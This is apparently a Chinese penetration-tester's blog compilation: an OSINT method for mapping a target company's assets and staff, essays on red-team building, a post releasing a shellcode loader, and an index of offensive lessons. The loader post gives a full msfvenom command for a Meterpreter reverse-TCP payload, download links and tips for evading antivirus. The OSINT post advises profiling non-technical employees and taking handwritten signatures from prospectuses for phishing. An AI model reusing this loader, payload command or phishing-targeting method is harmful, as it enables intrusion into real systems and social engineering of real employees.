2100年12月29日星期三

为什么会有这个博客

渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。
文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同学或者想要自我从头学习的同学也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com,由于博客可能非人为因素被停止更新,本博客所有的文章都转自我的另一个博客https://micropoor.blogspot.com。
在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。我于2011年离开这个圈子,到另一个圈子,于2016年末回归到这个圈子,发现这个圈子的精神变了,或者我跟不上潮流了,或者我掉队了。可能技术一旦与钱挂钩,技术可以快速变现的时候,那么它的味道就会变吧。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>



2017-11-17
Micropoor

2020年5月18日星期一

渗透的本质是信息搜集(第二季)

应当细心地观察,为的是理解。应当努力地理解,为的是行动。应当谨慎地行动,为的是再一次的观察。
----Micropoor
渗透的本质是信息搜集(第一季),第一季写于2018-03

注:本文所涉及的内容均为互联网公开内容,均来源于各个搜索引擎。


在第一季中,提到了信息搜集一定要“多维度”的搜集,“多维度”也正式本季的核心思想。以下将会从几方面论证信息搜集”多维度“的重要性以及其思想
在大型网络攻防对抗中,”多维度“的信息搜集分为4个方向,既:

1. 一级资产
2. 二级资产
3. 上游资产
4. 下游资产


何为一级资产:


顾名思义,既目标的直接资产,也就是,直接面向对象。如常见的:

1. 目标子域名
2. 目标APP资产
3. 目标域名备案信息
4. 目标微博,公众号信息
5. 目标邮箱用户信息
6. 目标VPN用户信息
7. 目标GitHub泄露信息
8. 目标服务器/中间件/CMS框架信息
9. 目标所有存活网站Waf信息
10.目标网盘或第三方网盘敏感文件信息
11. 等等.....

以上为常见的“目标直接资产”,但一级资产信息搜集,一定要以“直接面相对象”的思想来散发思路,以“吉比特”作为demo举例,论证“直接面相对象”的思想。

图片来源:Google搜索



在“吉比特”招股书找明确的写到截至本招股说明书签署之日,公司及其控股子公司已办理备案正在使用的网站域名情况,也就是说这里的内容将会继续扩大目标的“一级资产信息”。而其中许多公司得招股书中,会有大量得资产域名。

图片来源:招股书

在招股书中,其中目标公司股权结构也非常清晰:

图片来源:招股书






目标公司重要人员的其他重要信息也非常清晰:

例如手写签名:(用于后期钓鱼)

图片来源:招股书



例如注册商标:(用户了解更多的目标资产与品牌)

图片来源:招股书




股权结构,需要重点关注非技术类人员,例如:销售财务,后勤等职务的人员。此类人员是目标的重要人员,而且此类人员相对其他技术类人员安全意识较若,为“钓鱼”而铺垫。

简单的总结,既“一级资产”需要关注以下,这里主要分为2大类

1. 一级资产技术类,如子域名,C段等
2. 一级资产非技术类,如招股书的股权分析,目标公司的运营分析等。

注:如果目标是To B的公司,其很多核心人员为”非技术类“,这里需要根据目标公司的类型盈利方向等,制定出”适合“目标的特定方案。


一级资产总结:

以“直接面相对象过程”的核心思想,围绕目标进行“多维度”的信息搜集。


何为二级资产:

顾名思义,既围绕“一级资产”向下资产排查。如常见的:

1. 目标所有一级域名的C段
2. 目标所有存活资产的1-65535端口信息
3. 目标历史非存活资产,例:网络时光机
4. 目标所有主域名的向下第三方资源/资产排查
5. 目标关键人物(来源公司股权架构)的第三方信息,如mail,微信,百度网盘等
6. 第三方平台(要求特点:高频率互动),例如BOSS招聘,脉脉,领英。
7. 目标关键人物私有域名/APP
8. 目标关键人物GitHub泄露信息
9. 目标关键人物微博,公众号信息
10. 等等.....

以上为常见的“二级资产“,二级资产一定要以“化线为点”思想来散发思路,也就是说,二级资产是基于一级资产的方向,”化线转点“,把”一级资产“分解到具体,也就是量化到某个点,如某个端口某个人某个平台某个邮箱等。

以“UCloud”作为demo举例,论证“化线为点”的二级资产搜集思想。(相关图片已做处理,并全部基于互联网公开信息

“二级资产”的搜集其核心过程“化线为点”,把“一级资产”信息搜集的方向化解成可量化的“点”,也就是重点关注目标的某个人,某个物,某件事。
UCloud 在领英1,756 位关注者,其中明确包含466位员工。

图片来源:领英




注:如果信息搜集的来源基于某一个指定平台,一定要考虑此平台的同类型竞争平台,然后再次完善信息搜集的补全。例如:某个信息搜集的来源是源于谷歌,那么也一定要尝试类似:Bing,Baidu等同类型的竞争平台。结合本思想应用于本Demo。

在领英会发现相关人员是无姓名,职务,邮箱等更具体的信息,此时考虑与领英同类型竞争平台,如下图,来源于脉脉,通过脉脉得知了真实姓名,职务,所在地等更为具体的信息。

图片来源:脉脉




图片来源:Google搜索


至此得到了目标Demo的姓名,邮箱,职务,手机,微信等等。(注:由于仅为Demo,并验证其思想,作证其方法论,故此处无涉及隐私图)

注:在二级资产信息搜集的过程中,尤其是在量化到某个组织“个人”时,部分精力倾斜到头像/照片为正装的目标人员,一般用于个人正装/照片当头像的人,其内心是自信,开朗并且大部分人为非技术人员,也就是安全意识相对较若。相对较为近距离接触目标人物。在上例“领英”图片Demo中,会发现,随机出现的8人,有3人是非技术类,其中2人头像为“人像”照片,而此8人的技术类,无一使用正装”人像“为头像。

“二级资产”排查的过程中,秉承“向下”与“高交互”的核心思想,围绕“一级资产”展开行动。下例将继续佐证“向下”与“高交互”的核心思想进行行动。同以“UCloud”作为demo举例

图片来源:Google搜索




上图行为满足:
1:以“一级资产”向下排查
2:量化到具体的某个人,某个事,某个物等。
3:该文案发布的平台符合“高交互”条件

上图行为不满足:
1:文案平台符合“向下”与“高交互,但可量化的的目标暂不符合“高交互”

按照以上思想继续补充下一步行动,既:可量化目标转化并且创造“高交互”条件,以此增加“二级资产“信息搜集维度。



至此,量化目标人物的相关更具体地信息多维度的并且有序的"向下”展开。(注:仅为demo,至此结束


二级资产总结:

二级资产一定要以“化线为点”思想来发散思路,在搜集的过程中,务必要清晰清楚的隔离开”一级资产“,简单的概括:搜集一级资产,也就是线的过程中,务必且一定放弃”点“的信息,也就是能量化的信息。搜集二级资产,也就是点的过程中,务必且一定要放弃”线“的信息。思想分离开,行动也一定要分离开。


何为上游资产:

上游资产,是目标资产的上一个维度的信息搜集,既,降维搜集目标所有的资产其结果将会扩大“一级资产”并且联动了“二级资产”

上游/下游资产在大型网络攻防对抗中也是最容易忽略并且极为重要的一种手段,其根本原因是:上游/下游资产的信息搜集整理与排查是归类于:非技术并且涉及到了相关金融类知识领域。也就是攻防人员最容易忽略的一项。

“上游资产”的核心思想与“上游产业”极其相似,上游产业原指处在整个产业链的开始端,包括重要资源和原材料的采掘、供应业以及零部件制造和生产的行业,这一行业决定着其它行业的发展速度,具有基础性、原料性、联系性强的特点。在现代的产业链理论中,上游产业则是一个相对的概念。

同样,“上游资产”指“一级资产”的资产链开始端,“上游资产”与“下游资产”最大的区别在于“产业结构分析”与“股权结构分析”。以“吉比特”作为demo举例。(注:所有信息取自于互联网公开信息


图片来源:天眼查





主要分析其参股公司:

A:业务分类
B:盈利分类

A:何为业务分类
既参股控股公司的主营业务是否与目标一致或一个方向。
例如:参股控股公司业务是餐饮类,而目标主营业务是IT类,那么就不符合“上游资产”
例如:参股控股公司是IT大类,而目标主页业务是IT大类其中某个分支,例如分支为网络安全为主营方向。这里就需要继续分析两者关联性。

B:何为盈利分类
既参股控股公司的盈利方式,是属于“非盈利”或“纯盈利”
例如:参股控股公司是某“非盈利”,而目标则是盈利公司,那么就不符合“上游资产”
例如:参股控股公司是某“纯盈利”机构,(如:XXX投资机构,XXX投资基金),那么就不符合“上游资产”

上游资产总结:

分析“上游资产”时,一定要把“业务分类”与“盈利分类”的思想模型考虑进去,否则”一级资产”会出现非常混乱的结构,从而影响”二级资产“。


何为"下游资产":

"下游资产",是目标资产的下一个维度的信息搜集,既,"向下联动并关联"搜集目标所有的资产其结果将会扩大“一级资产”并且联动了“二级资产”范围。

“下游资产”的核心思想与“下游产业”极其相似,"下游产业"指处在整个产业链的末端,加工原材料和零部件,制造成品和从事生产,服务的行业。根据微笑曲线理论,上游往往是利润相对丰厚、竞争缓和的行业,原因是上游往往掌握着某种资源,比如矿产,或掌握核心技术,有较高的进入壁垒的行业。产业要形成竞争优势,就不能缺少世界一流的供应商,也不能缺少上下游产业的密切合作关系。

同样,"下游资产"是目标资产的延伸,既,"一级资产"与"二级资产"向下拓展延伸。在实际情况中,"下游资产"往往是大型目标的突破口,也是薄弱环节,同样它依然需要缜密的分析其两者的关联性。

图片来源:天眼查


排查与分析"下游资产"时,它又分为两类,既:

A:直接下游资产
B:间接下游资产

A:何为"直接下游资产"

"直接下游资产"的公司与目标直接参与参股控股,一般为80%——100%的投资比例,也就说为"下游资产"的大股东,或者完全控股子公司,其"下游资产"的产业为目标延伸产业互补或者是相同。也需重点关注目标公司实控人的"其他公司"是否有资金往来,业务往来,间接往来关系。

B:何为"间接下游资产"

"间接下游资产"的公司非与目标间接参与参股控股,或者是小比例的投资比例,非大股东,或者非实际控股,非子公司,其"间接下游资产"的主营产业也不符合目标公司的延申产业或者非互补产业。

下游资产总结:

大型网络对抗需要考虑攻击方的"主要成本",不同的环境,不同的背景,不同的方案,其"主要成本"不同,有的"主要成本"是时间成本,有的是"金钱成本",有的是"安全成本"等等,根据所在团队,所在任务,所在背景,建立不同的模型,并且考虑精力倾向于“直接下游资产”或是“间接下游资产”,而在分析的过程中,也一定要考虑目标与"下游资产"的关联性,紧密性,业务性,关系性,来往性,资金性,人员流动性等等。


文末:

随着互联网发展,信息传递的成本,透明度等成本比都在大幅降低,随着金融市场的完善,各行各业将会涉及到了大量的“上游资产”与“下游资产”,企业的网络安全方护离不开信息的保护与数据安全的完整性,这是每个一甲方与乙方值得思考的一个问题。也是每一个安全从业者值得深思的一个问题。攻击者在整个信息搜集的模型中,一定要考虑到可量化的目标的特性,目标人物特性,目标行业特性等,而防御方的网络安全意义培训也一定要考虑职员岗位特性,公司行业特性,攻击者来源特性等。

最后,关于模型总结致每一位安全从业者:

中小型的网络攻防对抗,如果最终取胜,一定是赢在了技术上。
大型的网络攻防对抗,如果最终取胜,一定是赢在了战术上。



2020年2月25日星期二

浅谈“竞争力”

最近一直在深思几个词:“竞争力”,“核心竞争力”等是什么?如何提高自己的“竞争力”等问题。

百度百科是这样解释的:
核心竞争力是指能够为企业带来比较竞争优势的资源,以及资源的配置与整合方式。随着企业资源的变化以及配置与整合效率的提高,企业的核心竞争力也会随之发生变化。凭借着核心竞争力产生的动力,一个企业就有可能在激烈的市场竞争中脱颖而出,使产品和服务的价值在一定时期内得到提升。

维基百科是这样解释的:
竞争力,是对象在竞争中显示的能力。因此它是一种随着竞争变化着的有通过竞争而体现的能力。
竞争力包含在对象的现在,但它是对象未来可以展示的能力。要测定竞争力需要确定一个测定目标时间。
要评价竞争力,需要确定一个比较竞争力的群体,根据目标时间在竞争群体中的表现评价它。测定和评价竞争力可以采用未来研究方法,但竞争力测定的是对象“现在”中包含的“未来”。

抽象以上概念,也就是”竞争力“的基础条件是2个对象,A与B,其中A是固定的值,B的取值范围是:A>B(B无限趋近于正无穷),也就是说A的竞争力比B大。

反推以上概念,如果A要保持核心竞争力。而改变B的取值范围,公式如下:A>B(0<B≤1)的时候,就是A的核心竞争力对于B的竞争力是永恒的。

如果以上概念,晦涩难懂,以下以”财务自由“的概念套入:
严格意义来说:巴菲特是不是财务自由?需要考虑3个主要变量,分别是A,B,t。其中A是当下的收入,B是当下的支出,t是时间。当收入小于支出,随着t的值增大,那么财富就会减小。而t的取值范围则是:第一次初始收入≤t≤生命终止。

那么核心竞争力,同样需要考虑3个主要变量,A,B,s,其中A是固定的对象,B是对比的对象,s是增长速度。而永恒竞争力的公式如下:

A>a(0<a≤1),A是此刻的你,a是上一刻的你。也就是说,今天的你要优于昨天的你。不去对比,只与自己对比,并且永远大于上一刻的你,便是你自己的永恒核心竞争力,当变量S(A)>S(B)[S为增长速度,A为你本身,B为对比对象],便是你永恒竞争力。







2019年12月26日星期四

论高级攻防团队建设方法论之思想的重要性(上)

注:文章较长,故分为多季来连载,转载请标注来源

前言:

本质可能发生转变,它可以由质变到量变,体系可以被打破,随时间的推移,它可以被推倒重塑,唯有思想将永垂不朽。
问题的背后是本质,本质的串联是体系,体系的整合是思想。

文章将会围绕“三个是什么?”来展开,分别是
1:问题的背后是什么?(上)
2:本质的背后是什么?
3:问题的背后是什么?

引言:创业公司的老板或者整体团队负责人都有一个特点,
如果这个人是销售出身:注重与人打交道
如果这个人是技术出身:注重与事打交道

像销售一样去思考,像技术一样去行动。
————Micropoor

一:问题的背后是什么?


1:团队技术模型与招聘管理

        顾名思义,高级攻防团队的建设,表面核心为“攻”,问题的背后是“人才”的管理。如何打造出一支能对抗“有组织,有纪律”的团队?一定是分工合理,责任明确,多个子部门联动的团队。至少一名主管,三名负责人,由于在招聘过程中会涉及到大量的技术模型重合,与人员沉淀,考虑到投入产出比平衡等,故其中负责人(一)主要团队技术模型为:“当下吃饱饭”,(不考虑部门编制,不考虑部门技术人员模型重复以及沉淀,只对部门当下KPI负责,负责面试一面)负责人(二,三)技术模型为:未来更美好(需要考虑到人员技能重合,考虑部门技术闭合,项目生命周期技能模型闭合,考虑人员沉淀等,有权拒绝重复性质人员进入,负责面试二面)。也就是说,每个负责人的责任不同,但方向相一致,一个是当下,一个是未来。主管需要考虑子部门与子部门之间的业务联动,技术闭合,利益共同体,人员的整体学习方法模型,整体方向,战略规划等。部门主管,一定要有放权的勇气,兜底的能力。





2:人员的学习与晋升

古人把一个职业的发展分为7个阶段:

奴:自愿和靠人监督的人
徒:能力不足,肯自愿学习的人
工:老老实实,按规矩做事的人
匠:精通一门技艺或手艺的人
师:掌握了规律,又能将其传授给他人的人
家:有固定的信念,让别人生活的更好的人
圣:精通事理,通达万物的人

同样网络安全学习也有10个阶段划:

问:自愿或靠人监督的人
学:能力不足,肯自愿学习的人
动:老老实实,按课本或教学实践的人
记:记录每次实践或学习心得体会并总结的人
体系:建立适合自己的体系,并能把知识碎片化结合到自我体系的人
问:体系建立后,重新归纳更新知识,并体系重新结构化的人
分享:掌握了规律,又能将其传授给他人的人
带团队:有固定的信念,带领团队或集体形成合力的人
授业:可以传授道理、教授学业、解答疑难问题,指路人。
育才:培养出比自己优秀和强大的人

以上为人员技术能力晋升阶段,而提升整体人员,又要从主动学习与被动学习,个人学习与团队学习方法建模。
爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习与主动学习的一个过程。
同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习


3:引入

        需要“心流理论”引入团队管理,根据契克森米哈伊的说法,就是个体完全地沉浸于体验本身,而体验本身就是最好的奖赏和动机。在心流状态中,我们的感觉和体验合二为一,即“行为和觉察融为一体”。在心流状态中,享受着巅峰体验,同时也做出了巅峰表现:既感受到了快乐,又展现出最好的状态。运动员把这种情形称为“在状态”。无论在心流的境界里做什么,踢球也好,雕刻也好,写诗也好,学习也好,对于正在进行的事情采取的是一种全神贯注的态度,没有任何人或事可以打扰我们或是使我们分心。在这种最佳状态下,能够更有效地学习、成长、进步并且向未来的目标迈进
       拥有清晰的目标是心流体验的前提。虽然目标有时会有所改变,但部门行进的方向是不能错的。当全心全力投入去实现目标,不为任何其他的诱惑所动摇时,才能获得心流体验。同时,当下以及未来的益处在这种状态下合二为一:遥远的目标不但不是阻力,反而可以帮助感受正在经历的意义。心流体验所带来的是更高层次的幸福,它把“一分耕耘,一分收获”变成了“现在的快乐即未来的成果”。“一分耕耘,一分收获”的说法代表我们必须承受极度的压力,无论是身体上还是心理上的,才能发挥100%的潜力,实现至高的目标;但在心流体验中,痛苦本身并不是巅峰表现的最高境界;相反,有一个区域是在过难和过易之间,在这个区间内,不但可以发挥出最大的潜力,还可以享受过程中的快乐。如果想要达到这个境界,任务的挑战要难易适度。


      如果任务难度大而技能不足时,会感到焦虑;相反,如果技能高超而任务太简单时,就会感到乏味。只有当难度和技能匹配时,心流体验才有可能出现。有两种不同的情况会影响拥有心流体验:一是有压力的环境,因为这样会带来焦虑;二是没有挑战性的环境,因为这样会使人觉得无聊、厌倦。
好的部门可以营造出一个传播幸福的工作环境。一些外在条件可以帮助员工在工作中找到更多的意义:第一,这份工作必须能够激发员工的才华和潜力;第二,雇员应该获得更大的发挥空间,在部门的运作中扮演更重要的角色,而不只是旁观者;第三,雇员应该感受到他们的业绩是有意义的。

一旦事物的本质抓住,那么就可以降维打击,以渗透的本质为例:

目标资产信息搜集的程度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。

以上是第一小节”论本质“的重要性,理论与实战结合参考:
渗透的本质是信息搜集                                                                                                                                                                                                                                                                                                                         

小结:问题的背后是本质技术团队不仅仅是由技术主导,而这背后隐藏了资源分配,资源倾斜,学习气氛,沟通,协同,人员能力晋升,团队技术模型与闭合等一系列问题。透过问题看本质。本质适用于”独狼“行动,可快速提高个人实战能力以及思想,但它并不适合”狼群“作战,也就是说团队协作并不适合"本质"方法论。




2019年8月22日星期四

网络安全学习方法论之体系的重要性

如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。

——Micropoor

古人半部论语治天下,读书考功只须熟读四书,而四书加起来不过区区5万字。可见网络安全学习知识体系的建立是重中之重。

古人将一个职业划分为7个阶段,既:


  • 奴:自愿和靠人监督的人
  • 徒:能力不足,肯自愿学习的人
  • 工:老老实实,按规矩做事的人
  • 匠:精通一门技艺或手艺的人
  • 师:掌握了规律,又能将其传授给他人的人
  • 家:有固定的信念,让别人生活的更好的人
  • 圣:精通事理,通达万物的人


同样网络安全学习也有10个阶段划,既:


  • 问:自愿或靠人监督的人
  • 学:能力不足,肯自愿学习的人
  • 动:老老实实,按课本或教学实践的人
  • 记:记录每次实践或学习心得体会并总结的人
  • 体系:建立适合自己的体系,并能把知识碎片化结合到自我体系的人
  • 问:体系建立后,重新归纳更新知识,并体系重新结构化的人
  • 分享:掌握了规律,又能将其传授给他人的人
  • 带团队:有固定的信念,带领团队或集体形成合力的人
  • 授业:可以传授道理、教授学业、解答疑难问题,指路人。
  • 育才:培养出比自己优秀和强大的人

只有体系化的知识结构才能教导你思考问题、引导你洞察趋势、指导你展开行动。


什么是体系?

  • 体系的本质是碎片化知识点的灵活串联与应用
  • 知识体系是基于人而存在的,世上不存在不同的人完全相同的知识体系

什么是知识体系?

  • 在我的定义中,知识体系是跟碎片知识相对应的概念,指高度有序的知识集合。也就是说,它由两部分组成:一是大量的知识点,二是有序的结构。



建立体系的过程?


  • 整理知识碎片化
  • 建立知识框架
  • 形成知识体系
  • 碎片化知识点纳入体系中

王国维在《人间词话》中说,古今之成大事业、大学问者,必经过三种之境界:


  • 昨夜西风凋碧树,独立高楼,望尽天涯路
  • 衣带渐宽终不悔,为伊消得人憔悴
  • 众里寻他千百度,蓦然回首,那人却在灯火阑处

爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习主动学习的一个过程。
同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习。

“输出”是最好的学习方式,“输出”的本质是体系重新结构化








这里总结了如下经常碰到的问题,值得每一位网络安全从业人员深思:

  • 不知道怎么学?
  • 不知道学哪个方向?
  • 越学越不会?
  • 感觉自己跟不上知识更新的速度?
  • 从事网安工作若干年后,感觉遇到技术瓶颈,怎么突破?
  • 工具/技术招式越来越多,怎么办?
  • 从事管理工作后,没有时间或者精力学习技术怎么办?

方法论结合于实战应用,请参考之前的文章如下:





结语:
在每次分享的同时,深深发现,原来分享,才是我最好的老师。
网络安全亦正亦邪,初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田美池桑竹之属。别在初极狭便放弃这“人间正道”,错过这“土地平旷,屋舍俨然,有良田美池桑竹之属。”,愿每一位读者能找到自己能融合贯通的“武功”,在结合吞噬其他“招式”,如行云流水,石便是器,枝便是剑。

2019年1月21日星期一

Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         




2019年1月4日星期五

PHP安全新闻早8点课程系列

     文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同事或者想要自我从头学习的同事也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com
     在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>,笔者相信有一天,你会发现原来弄清事物的本质是这样的有趣。






2017-11-17
Micropoor

动态:
          更新第十八课内容以及链接,2019-1-21
          暂停更新,文章核心全部围绕企业安全防御,预警为出发点。2019-1-25
          更新第二十一课至第二十六课内容以及链接,2019-2-4
          如有指定技术需求,请在系列中留言,会在未来课时中更新该相关技术文章。2019-2-18
          更新完毕第一章:生(100课时),点我下载。2019-2-18





第一章:


1-10课:
第一课:windows提权-快速查找exp
第二课:Linux提权-依赖exp篇
第三课:Delphi代码审计--项目实战1
第四课:Asp代码审计--项目实战2
第五课:工具介绍-Sqlmap
第六课:反攻的一次溯源--项目实战3
第七课:sql server 常用操作远程桌面语句
第八课:模拟诉求任务攻击
第九课:工具介绍-the-backdoor-factory
第十课:msfvenom常用生成payload命令

11-20课:
第十一课:工具介绍Veil-Evasion
第十二课:基于UDP发现内网存活主机
第十三课:基于ARP发现内网存活主机
第十四课:基于第十课补充payload1
第十五课:基于第十课补充payload2
第十六课:红蓝对抗渗透测试1
第十七课:红蓝对抗渗透测试2
第十八课:红蓝对抗渗透测试3
第十九课:基于netbios发现内网存活主机
第二十课:基于snmp发现内网存活主机

21-30课:
第二十一课:基于ICMP发现内网存活主机
第二十二课:基于SMB发现内网存活主机
第二十三课:基于MSF发现内网存活主机第一季
第二十四课:基于MSF发现内网存活主机第二季
第二十五课:基于MSF发现内网存活主机第三季
第二十六课:基于MSF发现内网存活主机第四季
第二十七课:基于MSF发现内网存活主机第五季
第二十八课:基于MSF发现内网存活主机第六季
第二十九课:发现目标WEB程序敏感目录第一季
第三十课:解决msfvenom命令自动补全

31-40课:
第三十一课:msf的前生今世
第三十二课:配置vps上的msf
第三十三课:攻击Mysql服务
第三十四课:攻击Sql server 服务
第三十五课:与Sqlmap结合攻击
第三十六课:解决vps上ssh掉线
第三十七课:vbs一句话下载payload
第三十八课:certutil一句话下载payload
第三十九课:vbs一句话下载payload补充
第四十课:ftp一句话下载payload

41-50课:
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP 服务
第四十三课:js一句话下载payload
第四十四课:certutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机

51-60课:
第五十一课:项目回忆:体系的本质是知识点串联
第五十二课:渗透的本质是信息搜集
第五十三课:内网渗透中的文件传输
第五十四课:基于Powershell做Socks 4-5代理
第五十五课:与Smbmap结合攻击
第五十六课:离线提取目标机hash
第五十七课:高级持续渗透-第一季关于后门
第五十八课:高级持续渗透-第二季关于后门补充一
第五十九课:高级持续渗透-第三季关于后门补充二
第六十课:高级持续渗透-第四季关于后门

61-70课:
第六十一课:高级持续渗透-第五季关于后门
第六十二课:高级持续渗透-第六季关于后门
第六十三课:高级持续渗透-第七季demo的成长
第六十四课:高级持续渗透-第八季demo便是远控
第六十五课:离线提取目标机hash补充
第六十六课:借助aspx对payload进行分离免杀
第六十七课:meterpreter下的irb操作第一季
第六十八课:基于Ruby内存加载shellcode第一季
第六十九课:渗透,持续渗透,后渗透的本质
第七十课:ftp一句话下载payload补充

71-80课:
第七十一课:基于白名单Msbuild.exe执行payload第一季
第七十二课:基于白名单Installutil.exe执行payload第二季
第七十三课:基于白名单Regasm.exe执行payload第三季
第七十四课:基于白名单Regsvcs.exe执行payload第四季
第七十五课:基于白名单Mshta.exe执行payload第五季
第七十六课:基于白名单Compiler.exe执行payload第六季
第七十七课:基于白名单Csc.exe执行payload第七季
第七十八课:基于白名单Msiexec执行payload第八季
第七十九课:基于白名单Regsvr32执行payload第九季
第八十课:基于白名单Wmic执行payload第十季

81-90课:
第八十一课:基于白名单Rundll32.exe执行payload第十一季
第八十二课:基于白名单Odbcconf执行payload第十二季
第八十三课:基于白名单PsExec执行payload第十三季
第八十四课:基于白名单Forfiles执行payload第十四季
第八十五课:基于白名单Pcalua执行payload第十五季
第八十六课:基于白名单Msiexec执行payload第八季补充
第八十七课:基于白名单Cmstp.exe执行payload第十六季
第八十八课:基于白名单Ftp.exe执行payload第十九季
第八十九课:基于白名单Url.dll执行payload第十七季
第九十课:基于白名单zipfldr.dll执行payload第十八季

91-100课:
第九十一课:从目标文件中做信息搜集第一季
第九十二课:实战中的Payload应用
第九十三课:与CrackMapExec结合攻击
第九十四课:基于实战中的small payload
第九十五课:基于portfwd端口转发
第九十六课:HTTP隧道ABPTTS第一季
第九十七课:MSF配置自定义payload控制目标主机权限
第九十八课:HTTP隧道reGeorg第二季
第九十九课:HTTP隧道Tunna第三季
第一百课:HTTP隧道reDuh第四季


第二章:


101-110课:
第一百零一课:基于SCF做目标内网信息搜集第二季
第一百零二课:对抗权限长期把控-伪造无效签名第一季
第一百零三课:Http加密隧道下的横向渗透尝试---klion
第一百零四课:Windows Smb 欺骗重放攻击利用---klion
第一百零五课:windows 单机免杀抓明文或hash [通过dump lsass进程数据]---klion
第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]---klion
第一百零七课:跨平台横向移动 [ windows计划任务利用 ]---klion
第一百零八课:跨平台横向移动 [wmi利用]---klion
第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机---klion
第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]---klion

111-120课:
第一百一十一课:内网mssql完整利用流程 [ 基础篇 ]---klion
第一百一十二课:利用Dropbox中转C2流量---klion
第一百一十三课:COM Hijacking---倾旋
第一百一十四课:渗透沉思录
第一百一十五课:使用CrackMapExec 进行 NTLM Hash传递攻击---倾旋
第一百一十六课:Windows域渗透 - 用户密码枚举---倾旋
第一百一十七课:Windows 本地特权提升技巧---倾旋
第一百一十八课:CVE-2017-11882钓鱼攻击---倾旋

121-130课:
第一百二十一课:http加密代理深度应用 [ abptts ]---klion
第一百二十二课:利用 ssh隧道实现内网断网机meterpreter反向上线---klion
第一百二十三课:利用ssh隧道将公网meterpreter弹至本地的msf中---klion

131-140课:

141-150课:

151-160课:

161-170课:

171-180课:

181-190课:

191-200课:


第三章:


201-210课:

211-220课:

221-230课:

231-240课:

241-250课:

251-260课:

261-270课:

271-280课:

281-290课:

291-300课:


第四章:




